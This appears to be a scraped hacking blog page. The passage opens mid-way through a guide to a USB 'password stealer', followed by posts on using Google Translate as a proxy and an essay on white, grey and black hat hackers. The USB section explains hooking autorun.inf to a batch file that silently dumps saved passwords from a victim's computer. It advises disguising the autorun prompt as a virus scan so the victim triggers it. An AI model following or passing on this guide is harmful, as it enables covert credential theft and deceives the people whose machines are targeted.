These were simple commands to start up our password "recovering" programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.




Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it's magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work.

See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.

This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.

Wednesday, 28 May 2014

Use Google As A Proxy !

BY Unknown IN , , No comments


How To Use Google As A Proxy ?


Method 1:

1. Visit whatismyipaddress and note down you real Ip Address
2. Now Go to Google Translate
3. From Under Detect Language, Chose your language in my case English
4. Now type http://whatismyipaddress.com/ in text area and click on Translate
5. Now check your Ip Address, Its different from the real one.

Method 2

1. Go to link given below:
http://www.google.com/translate?langpair=es|en&u=www.mybloggersworld.com
2. Change www.mybloggersworld.com to website you like to visit.
3. Done!

Types Of Hackers

BY Unknown IN , , , No comments


Hackers are three types:-


1. White hat hacker

2. Gray hat hacker

3. Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?

What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.


What Is A White Hat Hacker?


A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.

In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.


When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.

Grey Hat Hackers

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime.

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government. The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events. Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.

Black Hat Hackers

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals.
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.
Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.


What Is Black Hat Hacking?


A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transfernces to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigrou.